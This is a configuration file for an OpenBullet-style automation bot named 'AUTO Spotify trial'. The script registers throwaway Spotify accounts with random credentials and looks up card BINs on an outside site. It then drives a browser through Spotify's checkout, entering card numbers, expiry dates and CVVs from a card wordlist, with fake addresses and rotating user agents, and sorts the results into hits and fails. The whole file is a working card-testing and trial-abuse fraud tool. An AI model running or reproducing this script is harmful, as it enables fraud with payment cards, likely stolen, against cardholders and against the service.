[SETTINGS]
{
  "Name": "AUTO Spotify trial",
  "SuggestedBots": 3,
  "MaxCPM": 0,
  "LastModified": "2022-01-02T22:41:22.6639721+07:00",
  "AdditionalInfo": "https://github.com/imshubh69",
  "RequiredPlugins": [],
  "Author": "@Shubh",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "CC",
  "AllowedWordlist2": "CC",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": true,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": true,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": true,
  "CustomUserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/83.0.4103.116 Safari/537.36",
  "RandomUA": true,
  "CustomCMDArgs": "--incognito",
  "Title": "AUTO Spotify-trial",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
BROWSERACTION ClearCookies 

#displayname FUNCTION RandomString "?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l" -> VAR "displayname" 

#email FUNCTION RandomString "?l?l?l?l?l?l?l?l?l?l?l?l@tweek.cc" -> CAP "email" 

#pass FUNCTION RandomString "tweek.cc" -> CAP "pass" 

#number FUNCTION RandomNum "0" "9" -> VAR "number" 

FUNCTION RandomString "?d?d?d ?u?l?l?l" -> VAR "stress" 

#UA FUNCTION Translate 
  KEY "1" VALUE "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/83.0.4103.116 Safari/537.36" 
  KEY "2" VALUE "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/83.0.4103.116 Safari/537.36" 
  KEY "3" VALUE "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/76.0.3809.132 Safari/537.36" 
  KEY "4" VALUE "Mozilla/5.0 (Linux; Android 8.0.0; SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/69.0.3497.100 Mobile Safari/537.36" 
  KEY "5" VALUE "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/84.0.4147.89 Safari/537.36" 
  KEY "6" VALUE "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Brave/74" 
  KEY "7" VALUE "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/83.0.4103.106 Safari/537.36" 
  KEY "8" VALUE "Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Brave/74" 
  KEY "9" VALUE "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/83.0.4103.116 Safari/537.36" 
  "<number>" -> VAR "UA" 

!#UA FUNCTION GetRandomUA BROWSER Chrome -> VAR "UA" 

#year FUNCTION Translate 
  KEY "21" VALUE "21" 
  KEY "22" VALUE "22" 
  KEY "23" VALUE "23" 
  KEY "24" VALUE "24" 
  KEY "25" VALUE "25" 
  KEY "26" VALUE "26" 
  KEY "27" VALUE "27" 
  KEY "28" VALUE "28" 
  KEY "29" VALUE "29" 
  KEY "30" VALUE "30" 
  KEY "31" VALUE "31" 
  KEY "32" VALUE "32" 
  KEY "34" VALUE "34" 
  KEY "35" VALUE "35" 
  KEY "36" VALUE "36" 
  KEY "37" VALUE "37" 
  KEY "38" VALUE "38" 
  KEY "39" VALUE "39" 
  KEY "40" VALUE "40" 
  KEY "2021" VALUE "21" 
  KEY "2022" VALUE "22" 
  KEY "2023" VALUE "23" 
  KEY "2024" VALUE "24" 
  KEY "2025" VALUE "25" 
  KEY "2026" VALUE "26" 
  KEY "2027" VALUE "27" 
  KEY "2028" VALUE "28" 
  KEY "2029" VALUE "29" 
  KEY "2030" VALUE "30" 
  KEY "2031" VALUE "31" 
  KEY "2032" VALUE "32" 
  KEY "2033" VALUE "33" 
  KEY "2034" VALUE "34" 
  KEY "2035" VALUE "35" 
  KEY "2036" VALUE "36" 
  KEY "2037" VALUE "37" 
  KEY "2038" VALUE "38" 
  KEY "2039" VALUE "39" 
  KEY "2040" VALUE "40" 
  "<ano>" -> VAR "year" 

#Reg_acc REQUEST POST "https://spclient.wg.spotify.com/signup/public/v1/account/" 
  CONTENT "displayname=<displayname>&email=<email>&iagree=1&birth_month=3&gender=male&password_repeat=<pass>&password=<pass>&creation_point=client_mobile&key=bff58e9698f40080ec4f9ad97a2f21e0&birth_year=1994&platform=iOS-ARM&birth_day=20" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: spclient.wg.spotify.com" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Connection: keep-alive" 
  HEADER "App-Platform: iOS" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Spotify/8.6.4 iOS/13.5 (iPad11,1)" 
  HEADER "Accept-Language: vi, en;q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Spotify-App-Version: 8.6.4" 

#Check_bin REQUEST GET "https://tweek.cc/bin_lookup.php?lista=<cc>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Code PARSE "<SOURCE>" LR "Code: " " Bank:" CreateEmpty=FALSE -> CAP "Country" 

#OPEN BROWSERACTION Open 
  USERAGENT "<UA>" 

!BROWSERACTION SetWidth "450" 

#Login NAVIGATE "https://www.spotify.com/us/purchase/offer/new-family-1m/?country=<Country>&psp=billing_adyen_cards" 

!#Login NAVIGATE "https://www.spotify.com/ph-en/purchase/offer/default-payg-discount-12m/?country=PH&psp=billing_adyen_cards" 

#input_mail ELEMENTACTION XPath "//*[@id=\"login-username\"]" 
  SendKeys "<email>" 

#input_pass ELEMENTACTION XPath "//*[@id=\"login-password\"]" 
  SendKeys "tweek.cc" 

#login ELEMENTACTION XPath "//*[@id=\"login-button\"]" 
  Click 

#ENTER BROWSERACTION SendKeys "<ENTER>" 

FUNCTION Delay "9000" 

#Accept_Cookies ELEMENTACTION Selector "#onetrust-accept-btn-handler" 
  Click 

#Add_CC ELEMENTACTION Class "Type__TypeElement-sc-9snywk-0 eJjdqA Label-sc-192ocay-0 bJFMox" Recursive=TRUE 
  Click 

#WaitForElement ELEMENTACTION XPath "/html/body/div/div[2]/div/section/div/form/div[1]/div[1]/div[2]/iframe" 
  WaitForElement 

FUNCTION Delay "2000" 

#address-street ELEMENTACTION Id "address-street" 
  SendKeys "<stress>" 

#address-city ELEMENTACTION Id "address-city" 
  SendKeys "NY" 

#address-state ELEMENTACTION Selector "#address-state" 
  SelectOptionByText "New York" 

#address-postal_code_short ELEMENTACTION Id "address-postal_code_short" 
  SendKeys "10080" 

FUNCTION Delay "3000" 

#SwichtoFrame ELEMENTACTION XPath "//*[@id=\"__next\"]/main/div/div/section[2]/div/form/div[1]/div[1]/div[2]/iframe" Recursive=TRUE 
  SwitchToFrame 

ELEMENTACTION XPath "/html/body/div[2]/main/div/div/section[2]/div/div/ul/li[1]/a/div/div[1]/label/input" 
  Click 

#cc ELEMENTACTION Id "cardnumber" 
  SendKeys "<cc>" 

#mes_and_ano ELEMENTACTION Id "expiry-date" 
  SendKeys "<mes><year>" 

#cvv ELEMENTACTION Id "security-code" 
  SendKeys "<cvv>" 

#zipcode ELEMENTACTION XPath "//*[@id=\"zip-code\"]" 
  SendKeys "A1A1A1" 

BROWSERACTION SwitchToParentFrame 

FUNCTION Delay "2000" 

#enable_of_Country_CANADA ELEMENTACTION Selector "#__next > main > div > div > section.CheckoutSDKWrapperContainer-xc5z6m-0.frDkGU > div > form > div:nth-child(1) > div.sc-iUKrWq.kSLLaF > div:nth-child(1) > label" 
  Click 

#Buy_Premium ELEMENTACTION Id "checkout_submit" 
  Click 

#Enter BROWSERACTION SendKeys "<ENTER>" 

FUNCTION Delay "15000" 

BROWSERACTION DOMtoSOURCE 

PARSE "<SOURCE>" LR "</circle></svg><div><p>" "</p>" CreateEmpty=FALSE -> CAP "ERROR" 

KEYCHECK 
  KEYCHAIN Custom "Paid" OR 
    KEY "It looks like you’ve taken a trial before, which means you aren’t eligible for this offer" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<SOURCE>" DoesNotContain "Premium Family" 
  KEYCHAIN Success OR 
    KEY "Premium Family" 

#overview NAVIGATE "https://www.spotify.com/us/api/account/overview" BanOnTimeout=FALSE 

PARSE "<SOURCE>" LR "\"title\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Plan" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "Spotify Free" 
  KEYCHAIN Success OR 
    KEY "Premium" 
  KEYCHAIN Ban OR 
    KEY "Music without limits" 

BROWSERACTION ClearCookies 

